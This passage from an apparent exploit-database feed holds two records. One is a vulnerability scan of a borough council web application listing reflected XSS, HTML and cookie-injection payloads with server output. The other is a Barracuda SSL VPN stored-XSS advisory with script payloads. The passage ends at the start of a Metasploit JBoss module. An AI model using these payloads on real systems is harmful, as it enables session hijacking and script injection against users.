Multiple\r\nSource: SureCloud Vulnerability Scan\r\nIP Address:\r\nStatus: Open\r\nHostname\r\nLast Seen: 11 Nov 2014\r\nService: tcp/www:443\r\nSeverity: 3\r\nRisk: 30\r\nCVSS Base Score: 4.3\r\n \r\nDescription\r\n The remote web server hosts one or more CGI scripts that fail to\r\nadequately sanitize request strings with malicious JavaScript. By\r\nleveraging this issue, an attacker may be able to cause arbitrary HTML\r\nand script code to be executed in a user's browser within the security\r\ncontext of the affected site. These XSS vulnerabilities are likely to\r\nbe 'non\u00adpersistent' or 'reflected'.\r\n \r\nSolution\r\n Restrict access to the vulnerable application. Contact the vendor for\r\na patch or upgrade.\r\n \r\nInformation\r\nUsing the GET HTTP method, Nessus found that :\r\n+ The following resources may be vulnerable to cross\u00adsite scripting+\r\nThe 'sort' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?sort=504%20onerror=\"alert(504);\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n(extended patterns) :\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=504 onerror=\"alert(504);&archive=&k=\">< Back to resource view</\r\na>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n/pages/preview.php?sort=&sort=504%20onerror=\"alert(504);\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=504 onerror=\"alert(504);&archive=&k=\">< Back to resource view</\r\na>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n+ The 'order_by' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?order_by=504%20onerror=\"alert(504);\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=504 o\r\nnerror=\"alert(504);&sort=DESC&archive=&k=\">< Back to resource vi\r\new</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n/pages/preview.php?order_by=&order_by=504%20onerror=\"alert(504);\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=504 o\r\nnerror=\"alert(504);&sort=DESC&archive=&k=\">< Back to resource vi\r\new</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n+ The 'sort' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?sort=504%20onerror=\"alert(504);&search=&order_by=&fro\r\nm=\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=504 onerror=\"alert(504);&archive=&k=\">< Back to resource view</\r\na>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n/pages/preview.php?sort=&sort=504%20onerror=\"alert(504);&search=&order_b\r\ny=&from=\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=504 onerror=\"alert(504);&archive=&k=\">< Back to resource view</\r\na>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n+ The 'order_by' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?sort=&search=&order_by=504%20onerror=\"alert(504);&fro\r\nm=\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=504 o\r\nnerror=\"alert(504);&sort=&archive=&k=\">< Back to resource view</\r\nTonbridge & Malling Borough Council\r\n Vulnerabilities Report | 5\r\na>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror=\"alert\r\n(504);&from=\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=504 o\r\nnerror=\"alert(504);&sort=&archive=&k=\">< Back to resource view</\r\na>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\nClicking directly on these URLs should exhibit the issue :\r\n(you will probably need to read the HTML source)\r\n/pages/preview.php?sort=504%20onerror=\"alert(504);\r\n/pages/preview.php?order_by=504%20onerror=\"alert(504);\r\nReferences\r\nCWE: 116\r\nCWE: 20\r\nCWE: 442\r\nCWE: 692\r\nCWE: 712\r\nCWE: 722\r\nCWE: 725\r\nCWE: 74\r\nCWE: 751\r\nCWE: 79\r\nCWE: 80\r\nCWE: 801\r\nCWE: 81\r\nCWE: 811\r\nCWE: 83\r\nCWE: 86\r\n \r\n\u2013----------------------------------------------------------------------------------------------------\r\n \r\nVulnerability: 49067\r\nName: CGI Generic HTML Injections (quick test)\r\nType: CGI abuses : XSS\r\n Asset Group: Multiple\r\nSource: SureCloud Vulnerability Scan\r\nIP Address:\r\nStatus: Open\r\nHostname\r\nLast Seen: 11 Nov 2014\r\nService: tcp/www:443\r\nSeverity: 3\r\nRisk: 30\r\nCVSS Base Score: 5.0\r\n \r\nDescription\r\nThe remote web server hosts CGI scripts that fail to adequately sanitize\r\nrequest strings with malicious JavaScript. By leveraging this issue,\r\nan attacker may be able to cause arbitrary HTML to be executed\r\ninuser's browser within the security context of the affected site.\r\nThe remote web server may be vulnerable to IFRAME injections or\r\ncross\u00adsite scripting attacks :\r\n\u00ad IFRAME injections allow 'virtual defacement' that\r\nmight scare or anger gullible users. Such injections\r\nare sometimes implemented for 'phishing' attacks.\r\n\u00ad XSS are extensively tested by four other scripts.\r\n\u00ad Some applications (e.g. web forums) authorize a subset\r\nof HTML without any ill effect. In this case, ignore\r\nthis warning.\r\n \r\nSolution\r\nEither restrict access to the vulnerable application or contact the\r\nvendor for an update.\r\n \r\nInformation\r\nUsing the GET HTTP method, Nessus found that :\r\n+ The following resources may be vulnerable to HTML injection :\r\n+ The 'sort' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?sort=<\"jfunqd%20>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\na\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=<\"jfunqd >&archive=&k=\">< Back to resource view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n+ The 'order_by' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?order_by=<\"jfunqd%20>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=<\"jfu\r\nnqd >&sort=DESC&archive=&k=\">< Back to resource view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n+ The 'sort' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?sort=<\"jfunqd%20>&search=&order_by=&from=\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=<\"jfunqd >&archive=&k=\">< Back to resource view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n+ The 'order_by' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?sort=&search=&order_by=<\"jfunqd%20>&from=\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=<\"jfu\r\nnqd >&sort=&archive=&k=\">< Back to resource view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\nClicking directly on these URLs should exhibit the issue :\r\n(you will probably need to read the HTML source)\r\n/pages/preview.php?sort=<\"jfunqd%20>\r\n/pages/preview.php?order_by=<\"jfunqd%20>\r\n \r\nReferences\r\nCWE: 80\r\nCWE: 86\r\n \r\n\u2013---------------------------------------------------------------------------------------------------\r\nVulnerability: SC\u00ad1628\r\nName: SSL cookie without secure flag set\r\nType: Web Servers\r\nAsset Group: Multiple\r\nSource: SureCloud\r\nIP Address:\r\nStatus: Open\r\nHostname:\r\nLast Seen: 12 Nov 2014\r\nService: tcp/https:443\r\nSeverity: 3\r\nRisk: 30\r\nCVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )\r\n \r\nResolution Effort: 1\r\nDescription\r\n If the secure flag is not set, then the cookie will be transmitted in\r\nclear\u00adtext if the user visits any non SSL\r\n(HTTP) URLs within the cookie's scope.\r\nSolution\r\n The secure flag should be set on all cookies that are used for\r\ntransmitting sensitive data when accessing\r\ncontent over HTTPS.\r\nIf cookies are used to transmit session tokens, then areas of the\r\napplication that are accessed over HTTPS\r\nshould employ their own session handling mechanism, and the session\r\ntokens used should never be\r\ntransmitted over unencrypted communications.\r\nInformation\r\n \r\nURI: /pages/help.php\r\nOther Info: thumbs=show; expires=Tue, 08\u00adAug\u00ad2017 01:53:11 GMT\r\nURI: /pages/search.php\r\nOther Info: display=thumbs; httponly\r\nURI: /pages/themes.php\r\nOther Info: saved_themes_order_by=name; httponly\r\nURI: /pages/user_password.php\r\nOther Info: starsearch=deleted; expires=Tue, 12\u00adNov\u00ad2013 01:53:08 GMT; httponly\r\nURI: /pages/user_password.php\r\nOther Info: starsearch=deleted; expires=Tue, 12\u00adNov\u00ad2013 01:54:30 GMT; httponly\r\nURI: /pages/user_request.php\r\nOther Info: starsearch=deleted; expires=Tue, 12\u00adNov\u00ad2013 01:53:07 GMT; httponly\r\nURI: /pages/user_request.php\r\nOther Info: starsearch=deleted; expires=Tue, 12\u00adNov\u00ad2013 01:54:25 GMT; httponly\r\n \r\n\u2013-------------------------------------------------------------------------------\r\n \r\nVulnerability: 44136\r\nName: CGI Generic Cookie Injection Scripting\r\nType: CGI abuses\r\nAsset Group: Multiple\r\nSource: SureCloud Vulnerability Scan\r\nIP Address:\r\nStatus: Open\r\nHostname:\r\nLast Seen: 11 Nov 2014\r\nService: tcp/www:443\r\nSeverity: 3\r\nRisk: 30\r\nCVSS Base Score: 5.0\r\n \r\nDescription\r\nThe remote web server hosts at least one CGI script that fails to\r\nadequately sanitize request strings with malicious JavaScript.\r\nBy leveraging this issue, an attacker may be able to inject arbitrary\r\ncookies. Depending on the structure of the web application, it may be\r\npossible to launch a 'session fixation' attack using this mechanism.\r\nPlease note that :\r\n\u00ad Nessus did not check if the session fixation attack is\r\nfeasible.\r\n\u00ad This is not the only vector of session fixation.\r\n \r\nSolution\r\nRestrict access to the vulnerable application. Contact the vendor\r\nfor a patch or upgrade.\r\n \r\nInformation\r\nUsing the GET HTTP method, Nessus found that :\r\n+ The following resources may be vulnerable to cookie manipulation :\r\n+ The 'sort' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?sort=<script>document.cookie=\"testshay=5812;\"</script\r\n>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=<script>document.cookie=\"testshay=5812;\"</script>&archive=&k=\"><&nbs\r\np;Back to resource view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n/pages/preview.php?sort=&sort=<script>document.cookie=\"testshay=5812;\"</\r\nscript>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=<script>document.cookie=\"testshay=5812;\"</script>&archive=&k=\"><&nbs\r\np;Back to resource view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\nReferences\r\nCWE: 472\r\nCWE: 642\r\nCWE: 715\r\nCWE: 722\r\n \r\n\u2013--------------------------------------------------------------------------------------------\r\n \r\nVulnerability: 39466\r\nName: CGI Generic XSS (quick test)\r\nType: CGI abuses : XSS\r\nAsset Group: Multiple\r\nSource: SureCloud Vulnerability Scan\r\nIP Address:\r\nStatus: Open\r\nHostname:\r\nLast Seen: 11 Nov 2014\r\nService: tcp/www:443\r\nSeverity: 3\r\nRisk: 30\r\nCVSS Base Score: 5.0\r\n \r\nDescription\r\nThe remote web server hosts CGI scripts that fail to adequately sanitize\r\nrequest strings with malicious JavaScript. By leveraging this issue,\r\nan attacker may be able to cause arbitrary HTML and script code\r\nto be executed in a user's browser within the security context of the\r\naffected site.\r\nThese XSS are likely to be 'non persistent' or 'reflected'.\r\nSolution\r\nRestrict access to the vulnerable application. Contact the vendor\r\nfor a patch or upgrade.\r\n \r\nInformation\r\nUsing the GET HTTP method, Nessus found that :\r\n+ The following resources may be vulnerable to cross\u00adsite scripting\r\n(quick+ The 'order_by' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?order_by=<IMG%20SRC=\"javascript:alert(104);\">\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\ntest) :\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=<IMG\r\nSRC=\"javascript:alert(104);\">&sort=DESC&archive=&k=\">< Back to r\r\nesource view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n/pages/preview.php?order_by=&order_by=<IMG%20SRC=\"javascript:alert(104);\r\n\">\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=<IMG\r\nSRC=\"javascript:alert(104);\">&sort=DESC&archive=&k=\">< Back to r\r\nesource view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n+ The 'sort' parameter of the /pages/preview.php CGI :\r\n/pages/preview.php?sort=<IMG%20SRC=\"javascript:alert(104);\">\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=<IMG SRC=\"javascript:alert(104);\">&archive=&k=\">< Back to resou\r\nrce view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n/pages/preview.php?sort=&sort=<IMG%20SRC=\"javascript:alert(104);\">\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad output \u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n<p style=\"margin:7px 0 7px 0;padding:0;\"><a class=\"enterLink\" href=\"\r\n/pages/view.php?ref=&search=&offset=&order_by=&sort\r\n=<IMG SRC=\"javascript:alert(104);\">&archive=&k=\">< Back to resou\r\nrce view</a>\r\n\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\u00ad\r\n \r\nReferences\r\nCWE: 116\r\nCWE: 20\r\nCWE: 442\r\nCWE: 692\r\nCWE: 712\r\nCWE: 722\r\nCWE: 725\r\nCWE: 74\r\nCWE: 751\r\nCWE: 79\r\nCWE: 80\r\nCWE: 801\r\nCWE: 81\r\nCWE: 811\r\nCWE: 83\r\nCWE: 86\r\n \r\n\u2013--------------------------------------------------------------------------------------------------------------\r\n \r\nAlso issues to be aware of:\r\n \r\nVulnerability: SC\u00ad1629\r\nName: Cookie without HttpOnly flag set\r\nType: Web Servers\r\nAsset Group: Multiple\r\nSource: SureCloud\r\nIP Address:\r\nStatus: Open\r\nHostname:\r\nLast Seen: 12 Nov 2014\r\nService: tcp/https:443\r\nSeverity: 3\r\nRisk: 30\r\nCVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )\r\nResolution Effort: 1\r\nDescription\r\n When the HttpOnly attribute is set on a cookie, then the cookies\r\nvalue cannot be read or set by client\u00adside\r\nJavaScript.\r\nHttpOnly prevent certain client\u00adside attacks, such as Cross Site\r\nScripting (XSS), from capturing the cookies\r\nvalue via an injected script. When HttpOnly is set, script access to\r\ndocument.cookie results in a blank string\r\nbeing returned.\r\nSolution\r\n HttpOnly can safely be set for all Cookie values, unless the\r\napplication has a specific need for Script access\r\nto cookie contents (which is highly unusual).\r\nPlease note also that HttpOnly does not mitigate against all dangers\r\nof Cross Site Scripting \u00ad any XSS\r\nvulnerabilities identified must still be fixed.\r\nInformation\r\n URI: /pages/help.php\r\nOther Info: thumbs=show; expires=Tue, 08\u00adAug\u00ad2017 01:53:11 GMT\r\n \r\n\u2013-------------------------------------------------------------------------------\r\n \r\nVulnerability: SC\u00ad1629\r\nName: Cookie without HttpOnly flag set\r\nType: Web Servers\r\nAsset Group: Multiple\r\nSource: SureCloud\r\nIP Address:\r\nStatus: Open\r\nHostname:\r\nLast Seen: 12 Nov 2014\r\nService: tcp/http:80\r\nSeverity: 3\r\nRisk: 30\r\nCVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )\r\nResolution Effort: 1\r\n \r\nDescription\r\n When the HttpOnly attribute is set on a cookie, then the cookies\r\nvalue cannot be read or set by client\u00adside JavaScript.\r\nHttpOnly prevent certain client\u00adside attacks, such as Cross Site\r\nScripting (XSS), from capturing the cookies value via an injected\r\nscript. When HttpOnly is set, script access to document.cookie results\r\nin a blank string being returned.\r\n \r\nSolution\r\nHttpOnly can safely be set for all Cookie values, unless the\r\napplication has a specific need for Script access\r\nto cookie contents (which is highly unusual).\r\nPlease note also that HttpOnly does not mitigate against all dangers\r\nof Cross Site Scripting \u00ad any XSS vulnerabilities identified must\r\nstill be fixed.\r\n \r\nInformation\r\n URI: /pages/collection_share.php\r\nOther Info: thumbs=show; expires=Tue, 08\u00adAug\u00ad2017 01:53:42 GMT\r\nURI: /pages/contactsheet_settings.php\r\nOther Info: thumbs=show; expires=Tue, 08\u00adAug\u00ad2017 01:53:38 GMT\r\nURI: /pages/help.php\r\nOther Info: thumbs=show; expires=Tue, 08\u00adAug\u00ad2017 01:53:05 GMT\r\nURI: /pages/preview.php\r\nOther Info: thumbs=hide; expires=Tue, 08\u00adAug\u00ad2017 01:57:55 GMT\r\nURI: /pages/resource_email.php\r\nOther Info: thumbs=show; expires=Tue, 08\u00adAug\u00ad2017 01:57:42 GMT\r\nURI: /pages/view.php\r\nOther Info: thumbs=show; expires=Tue, 08\u00adAug\u00ad2017 01:57:45 GMT\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23013"}, {"lastseen": "2018-01-01T03:04:25", "references": [], "edition": 2, "description": "Exploit for hardware platform in category web applications", "reporter": "LiquidWorm", "published": "2013-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Barracuda SSL VPN 680Vx 2.3.3.193 - Script Injection Vulnerabilities", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-07-01T00:00:00", "id": "1337DAY-ID-20959", "href": "https://0day.today/exploit/description/20959", "sourceData": "Barracuda SSL VPN 680Vx 2.3.3.193 Multiple Script Injection Vulnerabilities\r\n \r\n \r\nVendor: Barracuda Networks, Inc.\r\nProduct web page: https://www.barracuda.com\r\nAffected version: 2.3.3.193, Model: V680\r\n \r\nSummary: The Barracuda SSL VPN is a powerful plug-and-play appliance\r\npurpose-built to provide remote users with secure access to internal\r\nnetwork resources.\r\n \r\nDesc: Barracuda SSL VPN suffers from multiple stored XSS vulnerabilities\r\nwhen parsing user input to several parameters via POST method. Attackers\r\ncan exploit these weaknesses to execute arbitrary HTML and script code in\r\na user's browser session.\r\n \r\nTested on: Linux 2.4.x, Jetty Web Server\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nVendor status:\r\n \r\n[05.03.2013] Vulnerabilities discovered.\r\n[16.03.2013] Contact with the vendor.\r\n[17.03.2013] Vendor replies.\r\n[19.03.2013] Working with the vendor.\r\n[28.03.2013] Vendor confirms issues, track BNSEC-1239.\r\n[15.04.2013] Asked vendor for status update.\r\n[17.04.2013] Vendor replies.\r\n[18.04.2013] Confirming that the issues are still present on the demo test sites. (v2.3.3.193)\r\n[07.05.2013] Vendor informs that the version 2.3.3.216 since 13.03.2013 is patched from these issues.\r\n[08.05.2013] Coordinating with the vendor.\r\n[08.06.2013] Vendor confirms that as of firmware version 2.3.3.216 the issues have been resolved.\r\n[01.07.2013] Coordinated public security advisory released.\r\n \r\n \r\n \r\nAdvisory ID: ZSL-2013-5147\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5147.php\r\n \r\nBarracuda Labs: http://barracudalabs.com/?page_id=3456\r\n http://barracudalabs.com/?page_id=3458\r\n \r\n \r\n05.03.2013\r\n \r\n--\r\n \r\n====================================================================================\r\n \r\n \r\nhttps://server/showSystemConfiguration.do?categoryId=821\r\n \r\nCRLs ADD: \"><script>alert(1);</script>\r\n \r\nParameter: propertyItem[25].value\r\n \r\n====================================================================================\r\n \r\n \r\nhttps://server/showAuditReports.do (Reports)\r\n \r\nUsername ADD: \"><script>alert(1);</script>\r\n \r\nParameters: user\r\n account\r\n \r\n====================================================================================\r\n \r\n \r\nhttps://server/showSystemConfiguration.do?categoryId=14800\r\n \r\nFiles to Scan ADD: \"><script>alert(1);</script>\r\nFiles to Exclude from Scanning ADD: \"><script>alert(2);</script>\r\nFiles to Block ADD: \"><script>alert(3);</script>\r\n \r\nParameters: propertyItem[1].value\r\n propertyItem[2].value\r\n propertyItem[3].value\r\n \r\n====================================================================================\r\n \r\n \r\nhttps://server/showSystemConfiguration.do?categoryId=810\r\n \r\nPublic Internal Web Sites ADD: \"><script>alert(1);</script>\r\nVPN Port ADD: \"><script>alert(2);</script>\r\n \r\nParameters: propertyItem[1].value\r\n propertyItem[8].value\r\n \r\n====================================================================================\r\n \r\n \r\nhttps://server/showAvailableAccounts.do\r\n \r\nAvailable Groups ADD: \"><script>alert(1);</script>\r\n \r\nParameter: selectedRoles\r\n \r\n====================================================================================\r\n \r\n \r\nhttps://server/editMessage.do?actionTarget=sendMessageToUser&resourceName=user&realm=1&parent_name=edit\r\n \r\nAccount ADD: \"><script>alert(1);</script>\r\nGroup ADD: \"><script>alert(2);</script>\r\nPolicy ADD: \"><script>alert(3);</script>\r\n \r\nParameter: policy\r\n \r\n====================================================================================\r\n \r\n \r\nhttps://server/editAccount.do?actionTarget=edit&username=guest&parent_name=edit\r\n \r\nAvailable Groups ADD: \"><script>alert(1);</script>\r\nAuthorized IP Addresses ADD: \"><script>alert(2);</script>\r\nOther Computers (Waks-On-LAN) ADD: \"><script>alert(3);</script>\r\n \r\nParameters: selectedRoles\r\n propertyItem[1].value\r\n propertyItem[6].value\r\n \r\n====================================================================================\r\n \r\n \r\nhttps://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=%22onmouseover=prompt%28%22XSS3%22%29%3E%0A%0DB&realm=9999&parent_name=edit\r\nhttps://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=CLICK%20ME%20PLEASE%20!!!%20ZOMG%20XSS%20INVISIBLE%20%22onmouseover=prompt%28document.location=%27http://zeroscience.mk%27%29%3E&realm=9999&parent_name=edit\r\n \r\nGroup ADD: \"><script>alert(1);</script>\r\n \r\nParameter: resourceName\r\n \r\n====================================================================================\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/20959"}, {"lastseen": "2018-03-09T23:33:02", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "reporter": "metasploit", "published": "2012-09-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "JBoss DeploymentFileRepository WAR Deployment", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-09-05T00:00:00", "id": "1337DAY-ID-19327", "href": "https://0day.today/exploit/description/19327", "sourceData": "require 'msf/core'\r\n\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = 